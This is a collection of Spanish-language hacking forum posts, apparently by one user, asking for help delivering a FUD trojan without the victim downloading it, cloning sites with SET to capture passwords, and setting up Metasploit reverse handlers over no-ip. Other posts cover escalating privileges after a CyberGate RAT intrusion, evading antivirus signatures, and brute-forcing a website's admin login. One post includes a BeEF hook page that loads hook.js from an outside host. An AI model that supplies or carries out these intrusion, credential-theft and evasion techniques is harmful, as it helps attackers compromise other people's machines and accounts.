Buenos dias:

  Estoy intentando enviarme un troyano desde mi red de casa a la de mi ordenador del trabajo, que es una red movil vodafone. Bien, he usado varias formas de envio, como comprimir en un rar con una foto, a traves de mediafire y enviar un lik de descarga etc...pero no son metodos muy útiles, ya que deben descargar los archivos la persona...y no se descarga automaticamente..también probe unir el troyano a una foto y salta , no el AV sino avisos de pc.

Alguien sabe como puedo enviarme un troyano (que además es FUD) sin que tenga que hacer la descarga yo manualmete?

Un saludo

Buenas tardes a todos...vuelvo con mis problemas con no-ip xD...

Vereis quiero clonar una web pero no en una red lan. dicho esto, cuando SET me pide mi ip, le meto mi no-ip y las demás configuraciones...el tema es que al probar en el otro equipo (pc victima), fuera de la red, la pagina , no aparace y me da error...me dice

    "Vaya, Internet Explorer no ha podido establecer conexion con la pagina mi-no-ip"

Alguien sabe qué estoy haciendo mal? debo hacer algo en el router?

Un saludo

Buenos dias:

   tengo un problema con metasploit y mi no-ip. espero que puedan ayudarme...estoy intentando lanzar un exploit desde una red a otra (no es la misma red). Una red es la de telefonica normal y corriente y la otra de vodafone (el tipico pincho usb). Bien...al configurar mi lhost en metasploit, le pongo...set LHOST no-ip. el tema es que al lanzar el exploit, lo primero que sale es :
Handler failed to bind to No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Started reverse handler on 0.0.0.0:4444

    Alguien sabe como configurar y si se puede una no-ip con metasploit?

Gracias!

Buenas tardes:

  Tengo un problemilla...tengo instalado el metasploit en windows y me gustaría añadir exploits. Bien, lo que hago es descargar el exploit (suele ser en extension TXT) y lo meto en la ruta correspondiente y l pongo extensión .rb. Pero después, no me lo detecta...le meto la ruta completa y no me lo detecta..alguien podria ayudarme? lo estoy buscando y solo aparece agregar en linux...
Saludos

Muy buenas..me he descargado bugtraq, pero tengo el problema de anonimizarse. Bien..yo trabajo con backtrack 5r3 y uso VPN de mullvad, pero no me funciona en bugtraq. He visto que tiene anonimizadores, pero si yo realizo una "auditoría", esos anonimizadores como jondo, sería como una VPN? Es decir, estaría oculto? O sólo me oculta si navego por internet. y si hago un escaneo de un objetivo, me saldría mi ip real??

Buenos días:

  Ayer usé el update y el upgrade en mi Backtrack (apt-get install update upgrade) y después de esto, al intentar entrar en msfconsole del metasploit, me salta lo siguiente:
Could not find rake-10.0.4 in any of the sources
Run `bundle install` to install missing gems.

  Corro bundle install y me da el siguiente error:
root@bt:~# bundle install
Bundler::GemfileNotFound

  He buscado por google y he probado de todo..no consigo hacer que funcione...alguna ayuda?

Un saludo

Buenos dias....tengo un pequeño problemilla....estoy trabajando con Beef. Hasta aquí todo corretco...saco el sript de demostracion y lo paso a otro equipo y me funciona perfectamente..pero claro..dentro de mi red...he probado desde una red externa, con un pincho de vodafone en uno de mis portatiles y redirijo el trafico hacia mi NO-IP...pues no me funciona...os paso mi modificación en el sript en Html, por si estoy equivocandome en algo, pero no me parece...si alguien puede darme una ayudita..lo agradezco...os copio el script en html...

<html>
<head>
   <title>BeEF Basic Demo</title>
   <script>
      var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
      document.write(commandModuleStr);
   </script><script src="http://mi.no-IP:3000/hook.js" type="text/javascript"></script>
</head>
<body>
   No toques nada!!! espera..puede tardar algo mas de lo normal BeEF.
   <p>
      Have fun while your browser is working against you.
   </p>
   <p>
      These links are for demonstrating the "Get Page HREFs" command module

   </p><ul>
   <li><a href="http://beefproject.com" target="_blank">The Browser Exploitation Framework Project homepage[/url]
   </li><li><a href="http://ha.ckers.org/" target="_blank">ha.ckers.org homepage[/url]
   </li><li><a href="http://slashdot.org/" target="_blank">Slashdot[/url]
   </li></ul>
   <p></p>
    <p>Have a go at the event logger.

    <label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input id="imptxt" name="Important Text" type="text"></p>
   <p>
      You can also load up a more advanced demo page <a href="butcher/index.html">here[/url]
   </p>
</body>
</html>

Buenas noches....con cybergate he conseguido entrar en un equipo de mi red...que por cierto es mío...
Bien, el tema es que no tengo los derechos de administrador...intento subir un archivo desde mi equipo l otro, pero me lo deniega...por los Av. Y firewall, lógicamente....alguien podría charle un cable par poder tener derechos de administrador, ya que entre en un usuario simple? Es un Windows 7 y el Av. Es Nod 32, por sí sirve de algo....

Un saludo

Buenos días:

   Estoy analizando la distro de backbox...no esta nada mal...pero necesitaria que alguien me ayudase..cuando le pido ser root, me pide la contraseña--la introduzco y me dice que no es la correcta..pero sí lo es...adeemás probandola en zenmap como root, tambien me la pide y al darle la misma, me la acepta como correcta...alguien podria ayudarme o darme alguna instruccion..?? necesito ser root para usar algunas aplicaciones!!!

Gracias!!

Buenos dias:

  He descargado el terminal emulator para poder terminar la instalacion de BT en mi tablet (Samsung Galaxy tab 2 5110), pero resulta que no me deja escribir. he desinstalado e instalado la app varias veces, he mirado los ajustes del teclado y creo que están correctos, si alguien me puede ayudar???

Un saludo

Buenas noches...buscando el como instalar mi bt, me he topado con esta App...la he estado probando y es muy útil y espectacular...probarla y ya me diréis... Os dejo el link..usa scanner, Exploits, conexiones, vulnerabilidades, fuerza bruta etc....

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo y ya me diréis.....

Buenos días...estoy instalando bt en mi tablet, pero me sale un problema...necesito 5 gb y en mi tablet solo tengo 2 útiles más o menos...tengo una tarjeta externa de 32 gb, pero como el que tiene un tío en cuenca....porque sí instaló en la tarjeta externa la imagen, no me funciona el bt a través de la terminal ni con el linux installer....Que puedo hacer?.?

Buenas tardes, tengo una tablet omega mid 7003, y he probado de todo, para rootear la. Usa un android v. 4.04. Podrías ayudarme a rootear la???

Gracias

Buenas tardes...usando el monster modder tool (he conseguido que vaya ok) estoy sacando firmas de un encriptado...empezó detectandolo 19 de 22 avs y ahora voy por 5 de 22...ahora bien...cuando estoy sacando la firma del ikarus o el dr web...llega un momento en qu eme sale ese error al ejecutar el avfucker..alguien sabe a qué se debe ese error.. el archivo funciona correctamente...pero no me deja ejecutar el avfucker...he buscado por ahí, pero no me sacan de dudas...si alguien me puede ayudar...

Un saludo

Nota: lo he publicado tb en otro foro...

Buenos días:

   Siguiendo uno de los tutoriales de Antrax, me autoinfecto con el spy-net en la direccion 127.0.0.1 y el puerto 81, tal como él dice..lo consigo, lógiucamente..pero al hacerlo a travé de mi no-ip, no pasa nada..lo estoy haciendo desde una red interna....alguien me podria ayudar???

Buenos días...alguien tiene algún Tuto sobre como modificar Exploits para el metasploit de backtrack?


Gracias

buenas tardes:

  Cuando lanzo un ataque de un sitio a clonar, para sacar unas pass, la respuesta que me da en la consola, es la siguiente:

Since the exploit picked requires port 80 for WebDav, the
SET HTTP Server port has been changed to 8080. You will need
to coax someone to your IP Address on 8080, for example
you need it to be No tienes permitido ver los links. Registrarse o Entrar a mi cuenta instead of standard
http (80) traffic.

• Moving payload into cloned website.
  
• The site has been moved. SET Web Server is now listening..
  [-] Launching MSF Listener...
  [-] This may take a few to load MSF...
  [-] ***
  [-] * WARNING: Database support has been disabled
  [-] ***
  
  
  y después, cuando conecta con el metasploit, el resultado final es el siguiente:
  
  
• Exploit running as background job.
  msf  exploit(ms10_042_helpctr_xss_cmd_exec) >
  [-] Handler failed to bind to (mi direccion de IP):4444
  
• Started reverse handler on 0.0.0.0:4444
  [-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:80).
  
  He seguido el proceso del manual de Intecco sobreInformation gathering, pero me da errror. es posible que me lo de, porque estoy haciendolo con dos equipos dentro de la misma red? por favor, si alguien me puede aclarar, lo agradecería!!!
  
  un saludo
  
  

Buenos días....alguienodria pasarme algún tutorial de como hackear a través de Routers?

Un saludo

Buenos días....despues de conseguir entrar en un router, seria posible conectarme a algún pc de esa red, a través del router? No se si abriendo puertos o creando VPN o si hay algún otro método...alguien podría darme algún tutorial sobre el tema??

Un saludo

Buenos días:

  Cuando lanzo algunso exploits, me salen respuestas como estas y se queda el ordenador ahí...alguien me puede decir el por qué??

msf> exploit -j
Exploit running as background job
started bind handler
sending backdoor command

y aquí se queda...ese uno por ejemplo...otro se me queda colgado en ...

started bind handler...

si alguien pudiera decirme el por qué esto...lo agradezco..

un saludo

Buenas noches:

   Tengo instalado el backtrack 5 gnome y a la hora de usar el armitage, cuando escaneo hosts, me dice " Database not conected"...alguien pouede ayudarme....

un saludo

Hola....después de utilizar el Hail Mary hacia un objetivo, me indica lo siguiente...
No active sessions....alguien puede decirme que es?

Hola...he instalado una VPN (vpntunnel) siguiendo la guia paso a paso...pero no puedo navegar después...no me funciona ningún navegador....alguien me puede ayudar? Lo he instalado en BT 5 R2.

Root@bt:~# apt-get install openvpn resolvconf
Reading package lists... Done
Building dependency tree       
Reading state information... Done
openvpn is already the newest version.
The following packages were automatically installed and are no longer required:
  libecryptfs0 libdmraid1.0.0.rc16 libdebconfclient0 ecryptfs-utils cryptsetup rdate bogl-bterm
  libdebian-installer4 reiserfsprogs dmraid python-pyicu
Use 'apt-get autoremove' to remove them.
The following NEW packages will be installed:
  resolvconf
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 56.4kB of archives.
After this operation, 279kB of additional disk space will be used.
Get:1 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta revolution/main resolvconf 1.45ubuntu1 [56.4kB]
Fetched 56.4kB in 1s (48.8kB/s)     
Preconfiguring packages ...
Selecting previously deselected package resolvconf.
(Reading database ... 225227 files and directories currently installed.)
Unpacking resolvconf (from .../resolvconf_1.45ubuntu1_all.deb) ...
Processing triggers for ureadahead ...
Processing triggers for man-db ...
Setting up resolvconf (1.45ubuntu1) ...
mkdir: created directory `/var/run/resolvconf'
mkdir: created directory `/var/run/resolvconf/interface'
update-rc.d: warning: resolvconf stop runlevel arguments (none) do not match LSB Default-Stop values (0 6)

root@bt:~# cd etc
bash: cd: etc: No such file or directory
root@bt:~# cd ..
root@bt:/# cd etc
root@bt:/etc# cd openvpn
root@bt:/etc/openvpn# ls
cert.zip  Linux-confs.zip  update-resolv-conf
root@bt:/etc/openvpn# unzip No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Archive:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   creating: cert/
  inflating: cert/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/cert/
  inflating: __MACOSX/cert/._.DS_Store 
  inflating: cert/ca-uk.crt         
  inflating: cert/ca-us.crt         
  inflating: cert/ca.crt             
  inflating: cert/ro.crt             
  inflating: cert/ru.crt             
root@bt:/etc/openvpn# unzip No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Archive:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   creating: Linux-confs/
  inflating: Linux-confs/.DS_Store   
   creating: __MACOSX/Linux-confs/
  inflating: __MACOSX/Linux-confs/._.DS_Store 
  inflating: Linux-confs/Blackhole.conf 
  inflating: Linux-confs/openvpn-DE.conf 
  inflating: Linux-confs/openvpn-NL.conf 
  inflating: Linux-confs/openvpn-RO.conf 
  inflating: Linux-confs/openvpn-RU.conf 
  inflating: Linux-confs/openvpn-Swe.conf 
  inflating: Linux-confs/openvpn-UK.conf 
  inflating: Linux-confs/openvpn-US.conf 
root@bt:/etc/openvpn# mkdir keys
root@bt:/etc/openvpn# ls
cert  cert.zip  keys  Linux-confs  Linux-confs.zip  __MACOSX  update-resolv-conf
root@bt:/etc/openvpn# cd cert
root@bt:/etc/openvpn/cert# ls
ca.crt  ca-uk.crt  ca-us.crt  ro.crt  ru.crt
root@bt:/etc/openvpn/cert# mv ca.crt /openvpn/keys/
mv: cannot move `ca.crt' to `/openvpn/keys/': No such file or directory
root@bt:/etc/openvpn/cert# mv ca.crt etc/openvpn/keys/
mv: cannot move `ca.crt' to `etc/openvpn/keys/': No such file or directory
root@bt:/etc/openvpn/cert# mv ca.crt /etc/openvpn/keys/
root@bt:/etc/openvpn/cert# ls
ca-uk.crt  ca-us.crt  ro.crt  ru.crt
root@bt:/etc/openvpn/cert# cd ..
root@bt:/etc/openvpn# cd  keys
root@bt:/etc/openvpn/keys# ls
ca.crt
root@bt:/etc/openvpn/keys# cd ..
root@bt:/etc/openvpn# ls
cert  cert.zip  keys  Linux-confs  Linux-confs.zip  __MACOSX  update-resolv-conf
root@bt:/etc/openvpn# cd Linux-confs
root@bt:/etc/openvpn/Linux-confs# ls
Blackhole.conf   openvpn-NL.conf  openvpn-RU.conf   openvpn-UK.conf
openvpn-DE.conf  openvpn-RO.conf  openvpn-Swe.conf  openvpn-US.conf
root@bt:/etc/openvpn/Linux-confs# mv openvpn-NL.conf /etc/openvpn/
root@bt:/etc/openvpn/Linux-confs# cd ..
root@bt:/etc/openvpn# ls
cert  cert.zip  keys  Linux-confs  Linux-confs.zip  __MACOSX  openvpn-NL.conf  update-resolv-conf
root@bt:/etc/openvpn# openvpn /etc/openvpn/openvpn-NL.conf
Mon Jun 11 22:17:44 2012 OpenVPN 2.1.0 x86_64-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Jul 20 2010
Enter Auth Username:*******
Enter Auth Password:
Mon Jun 11 22:18:03 2012 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Mon Jun 11 22:18:03 2012 LZO compression initialized
Mon Jun 11 22:18:03 2012 UDPv4 link local: [undef]
Mon Jun 11 22:18:03 2012 UDPv4 link remote: [AF_INET]***.***.*.**:30001
Mon Jun 11 22:18:03 2012 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Mon Jun 11 22:18:04 2012 [server] Peer Connection Initiated with [AF_INET]***.***.*.***:30001
Mon Jun 11 22:18:07 2012 TUN/TAP device tun0 opened
Mon Jun 11 22:18:07 2012 /sbin/ifconfig tun0 **.***.**.***pointopoint **.***.**.***mtu 1500
Mon Jun 11 22:18:07 2012 Initialization Sequence Completed

Un saludo

Hola a todos....tengo una duda algo rara y tonta..pero no encuentro la respuesta y me siento un poco gilip....ollas!! Cuando le doy a show Exploit, me sale un listado muy grande, pero no puedo ver los primeros....que parámetro he de poner para ver por páginas?

Buenas a todos...al usar el attack, una vez escaseado el objetivo etc.  Al lanzar el Exploits sugerido, tarda mucho en enganchar con el objetivo cuando el Exploits es a través de http o de ftp...se queda esperando y no me da ningún error..simplemente se queda esperando...para probar utilizo otro Exploits a la vez, que se que no es útil, y si me da el error, con lo que mi equipo no es...alguien me puede ayudar?
Por cierto, armitage es útil?

Buenas noches foro!! Estoy intentando sacar usuario y contraseña a través de fuerza bruta. He utilizado los siguientes softwares:
- brutus
- hydra
- medusa
- bruter....


Utilizo un diccionario hecho por mi...mezcla de varios diccionarios...el tema es que me dan muchos passwords y usuarios, que no son reales y luego me dan múltiples fallos o se me quedan colgados...alguien podría aconsejarme???




Un saludo

Hola...curioseando por webs, estoy ahora en una, donde en la parte de administración de la misma, no usa usuario y contraseña por defecto..que por cierto, muchas mas de lo que yo esperaba, si lo hacen....como podría intentar descubrir dichas contraseñas??? Existe algún software tipo ophcrack, pero de forma remota....

Hola a todos!! Como podría saber, que un servidor tiene un sistema de detección de intrusos...existe alguna tool para saberlo?

Hola, estoy haciendo practicas con las ip en mi casa, pero son todas internas, lógicamente...el problema es, como puedo acceder a mi ip, desde un hotel a 150 kms, por ejemplo? A través de mi ip publica? Y si mi ip publica es 123.123.123.123, y luego tengo dos equipos, uno con la ip privada 192.168.1.34 y otro con la 35, como puedo llegar hasta ellos?

Hola a todos....me he dado cuenta de que estoy aprendiendo a sacar informacion y contraseñas del equipo víctima y no se entrar en la misma, sin Exploits....alguien me puede dar ideas???

Hola, esto que os pregunto, es porque tengo varios equipos, con Linux, W7 y XP. La verdad es que entre el w7 y el xp, me funciona mejor el xp...pero, cual es mejor???

Hola, me he descargado el show ip en firefox, pero no me aparece en la pantalla del navegador....utilizo backtrack 5....me podéis decir como visualizarlo...

Hola a todos....primero me gustaría presentarme...es mi primer msg...gracias por hacer estas páginas....

Ahora mi pregunta...que software o softwares son los mas útiles actualmente para este paso del ataque? Para sacar usuarios,administradores, privilegios...he usado dumpsec y hyena, pero no me funcionan actualmente, no se si es que soy yo o que son muy antiguos....

Un saludo